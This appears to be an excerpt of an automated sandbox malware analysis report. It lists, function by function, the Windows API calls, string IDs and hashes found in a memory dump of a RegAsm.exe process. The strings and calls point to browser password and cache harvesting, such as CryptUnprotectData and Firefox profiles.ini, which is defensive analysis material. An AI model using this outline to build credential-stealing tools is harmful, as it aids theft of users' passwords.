                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                  • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                  • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                  • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                  • free.MSVCRT ref: 00418370
                                                                                                                                    • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                                                                                    • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                                  • String ID: OsError 0x%x (%u)
                                                                                                                                  • API String ID: 2360000266-2664311388
                                                                                                                                  • Opcode ID: 7a793c3aafbc7d353b0e578237d4b483da7e71834841705644cfc2f7eabd6d8e
                                                                                                                                  • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                                  • Opcode Fuzzy Hash: 7a793c3aafbc7d353b0e578237d4b483da7e71834841705644cfc2f7eabd6d8e
                                                                                                                                  • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                                  Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                  • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                  • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                  • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                    • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                    • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                  • memset.MSVCRT ref: 0040265F
                                                                                                                                  • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                                                    • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                    • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                  • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                                                  • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcsicmp$Freememcpy$Library$CryptDataLocalUnprotectmemsetwcslen
                                                                                                                                  • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                  • API String ID: 2257402768-1134094380
                                                                                                                                  • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                                                                                  • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                                  • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                                                                                  • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                                  Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                  • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                  • GetDC.USER32 ref: 004140E3
                                                                                                                                  • wcslen.MSVCRT ref: 00414123
                                                                                                                                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                  • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                  • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                                  • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                  • String ID: %s:$EDIT$STATIC
                                                                                                                                  • API String ID: 2080319088-3046471546
                                                                                                                                  • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                  • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                                  • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                  • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                                  Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                                  • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                                  • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                                  • memset.MSVCRT ref: 00413292
                                                                                                                                  • memset.MSVCRT ref: 004132B4
                                                                                                                                  • memset.MSVCRT ref: 004132CD
                                                                                                                                  • memset.MSVCRT ref: 004132E1
                                                                                                                                  • memset.MSVCRT ref: 004132FB
                                                                                                                                  • memset.MSVCRT ref: 00413310
                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                                  • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                                  • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                                  • memset.MSVCRT ref: 004133C0
                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                                  • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                                                  • wcscpy.MSVCRT ref: 0041341F
                                                                                                                                  • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                                  • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                                  • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                                  Strings
                                                                                                                                  • {Unknown}, xrefs: 004132A6
                                                                                                                                  • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                  • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                  • API String ID: 4111938811-1819279800
                                                                                                                                  • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                  • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                                  • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                  • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                                                  Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                                  • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                                  • SetCursor.USER32(00000000), ref: 0040129E
                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                                  • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                                  • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                                  • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                                  • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                                  • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                                  • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                                  • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                                  • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                                  • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 829165378-0
                                                                                                                                  • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                  • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                                  • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                  • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                                  Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • memset.MSVCRT ref: 00404172
                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                  • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                  • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                  • memset.MSVCRT ref: 00404200
                                                                                                                                  • memset.MSVCRT ref: 00404215
                                                                                                                                  • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                  • wcscpy.MSVCRT ref: 00404242
                                                                                                                                  • memset.MSVCRT ref: 0040426E
                                                                                                                                  • memset.MSVCRT ref: 004042CD
                                                                                                                                  • memset.MSVCRT ref: 004042E2
                                                                                                                                  • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                  • wcscpy.MSVCRT ref: 00404311
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                  • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                  • API String ID: 2454223109-1580313836
                                                                                                                                  • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                  • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                                  • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                  • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                                  Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                                  • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                                  • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                                  • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                                  • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                                  • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                                                  • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                                  • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                                  • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                                  • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                                  • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                                  • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                                    • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                                    • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                                  • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                                  • API String ID: 4054529287-3175352466
                                                                                                                                  • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                  • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                                  • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                  • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                                  Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _snwprintf$memset$wcscpy
                                                                                                                                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                  • API String ID: 2000436516-3842416460
                                                                                                                                  • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                  • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                                  • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                  • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                                  Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                    • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                  • free.MSVCRT ref: 0040E49A
                                                                                                                                    • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                  • memset.MSVCRT ref: 0040E380
                                                                                                                                    • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                    • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                  • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                  • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                                                                                                  • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E407
                                                                                                                                  • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E422
                                                                                                                                  • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E43D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                                  • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                  • API String ID: 3849927982-2252543386
                                                                                                                                  • Opcode ID: 60a964cb735b7f2e388f13091a32ea25ff980dc40793d4a043d01af8ab6a7d2e
                                                                                                                                  • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                  • Opcode Fuzzy Hash: 60a964cb735b7f2e388f13091a32ea25ff980dc40793d4a043d01af8ab6a7d2e
                                                                                                                                  • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                                                  Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • memset.MSVCRT ref: 004091E2
                                                                                                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                  • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                  • memcmp.MSVCRT ref: 004092D9
                                                                                                                                  • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                                  • memcmp.MSVCRT ref: 0040933B
                                                                                                                                  • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                                  • memcmp.MSVCRT ref: 00409411
                                                                                                                                  • memcmp.MSVCRT ref: 00409429
                                                                                                                                  • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                                  • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                                  • memcmp.MSVCRT ref: 004094AC
                                                                                                                                  • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                                  • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3715365532-3916222277
                                                                                                                                  • Opcode ID: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                                                                                  • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                  • Opcode Fuzzy Hash: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                                                                                  • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                                                                  Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                  • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                  • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                  • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                  • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                    • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                    • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                    • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                  • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                  • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                  • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                  • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1700100422-0
                                                                                                                                  • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                  • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                                  • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                  • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                                  Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                  • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                  • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                  • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
